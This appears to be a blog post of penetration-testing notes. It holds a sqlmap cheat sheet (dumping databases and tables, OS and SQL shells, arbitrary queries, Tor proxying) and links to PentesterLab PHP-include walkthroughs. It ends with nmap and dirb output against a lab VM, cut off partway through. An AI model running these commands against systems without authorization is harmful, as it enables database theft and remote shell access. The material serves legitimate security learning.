# Enumerate databases sqlmap --dbms=mysql -u "$URL" --dbs # Enumerate tables sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables # Dump table data sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump # Specify parameter to exploit sqlmap --dbms=mysql -u "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2 # Specify parameter to exploit in 'nice' URIs sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1 # Get OS shell sqlmap --dbms=mysql -u "$URL" --os-shell # Get SQL shell sqlmap --dbms=mysql -u "$URL" --sql-shell # SQL query sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;" # Use Tor Socks5 proxy sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs1. from https://gist.github.com/jkullick/03b98b1e44f03986c5d1fc69c092220d
Walkthrough 1. https://medium.com/@Kan1shka9/pentesterlab-php-include-and-post-exploitation-walkthrough-8a85bcfa7b1d 2. Ine [] 3. http://megwhite.com.au/pentester-lab-bootcamp-walkthrough-php-include-post-exploitation/ 4. http://fallensnow-jack.blogspot.com/2014/07/pentester-lab-php-lfi-post-exploitation.html Notes: root@kali:~# nmap 10.0.0.12 Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-30 12:23 EDT Nmap scan report for 10.0.0.12 Host is up (0.00035s latency). Not shown: 999 filtered ports PORT STATE SERVICE 80/tcp open http MAC Address: 08:00:27:1F:12:24 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds root@kali:~# Enumerating port 80 Run dirb root@kali:~# dirb http://10.0.0.12/ ----------------- DIRB v2.22 By The Dark Raver...
Comments
Post a Comment